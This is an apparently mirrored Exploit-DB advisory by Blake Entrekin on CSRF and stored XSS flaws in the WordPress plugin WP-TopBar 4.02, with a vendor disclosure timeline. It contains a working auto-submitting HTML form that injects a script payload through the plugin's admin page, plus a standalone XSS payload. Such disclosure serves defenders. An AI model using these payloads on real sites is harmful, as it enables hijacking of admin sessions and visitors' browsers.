WordPress Plugin wp-topbar 4.02 – Multiple Vulnerabilities

• Exploit Database
• 101 阅读

• 作者： Blake Entrekin
  日期： 2012-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/21393/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103

  # Exploit Title: WP-TopBar 4.02 CSRF # Date: 2012-09-13 # Author: Blake Entrekin # Version: 4.02 # Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip # Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/ ------------------- CSRF -------------------     The wp-topbar.php does not utilize a nonce value when submitting any POST changes.As a result, this page is vulnerable to Cross Site Request Forgery.   Proof of Concept Code:   <html> <head> <title></title> </head> <body> <form name="testform" action=" https://localhost/wordpress/wp-admin/admin.php?page=wp-topbar.php&action=topbartext&barid=1" method="POST"> <br> <input type="hidden" name="wptbbartext" value="</script><script>onload=alert(3)</script>"> <input type="hidden" name="wptblinktext" value="whatever"> <input type="hidden" name="wptblinkurl" value="http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fwp-topbar%2F"> <input type="hidden" name="wptblinktarget" value="blank"> <input type="hidden" name="wptbenableimage" value="false"> <input type="hidden" name="wptbbarimage" value=""> <input type="hidden" name="update_wptbSettings" value="Update+Settings">   </form> <script type="text/javascript"> document.testform.submit(); </script> </body> </html>   This script takes advantage of a logged in user to submit the required variables needed to update an existing TopBar with the required settings that commits and executes a Stored XSS vulnerability from a previous disclosure.In this example it was tested against a wordpress application running on �localhost� and altered a TopBar with the �id� of 1.This version of WP-TopBar creates a default TopBar with the id of 1 upon installation.Any subsequent TopBar created has an id incremented.It can be assumed that a user is more then likely to still have the default TopBar and easily attack it.   # Vulnerability Timeline 2012-09-04 � Vulnerability Reported 2012-09-05 � Developer Acknowledges 2012-09-10 � Developer Issues Fix (v4.03) 2012-09-15 -Vulnerability Disclosed   -- Blake Entrekin Independent Security Consultant/ Web Penetration Tester http://EntreSec.blogspot.com Twitter: @entresec <https://twitter.com/#%21/entresec>     # Exploit Title: WP-TopBar 4.02 Authenticated Stored XSS # Date: 2012-09-13 # Author: Blake Entrekin # Version: 4.02 # Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip # Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/ ------------------- Stored XSS -------------------   The message field (wptbbartext variable) of the wp-topbar.php page is vulnerable to Stored Cross-site Scripting.This variable is only accessible via the admin menu of the plugin.   The following code is an example:   </script><script>alert(3)</script>   This code is committed to the database upon submission and will run both under the admin interface when the bar is shown as a preview as well as the front facing page where the bar is set to display.   # Vulnerability Timeline 2012-09-04 � Vulnerability Reported 2012-09-05 � Developer Acknowledges 2012-09-10 � Developer Issues Fix (v4.03) 2012-09-15 -Vulnerability Disclosed   -- Blake Entrekin Independent Security Consultant/ Web Penetration Tester http://EntreSec.blogspot.com Twitter: @entresec <https://twitter.com/#%21/entresec>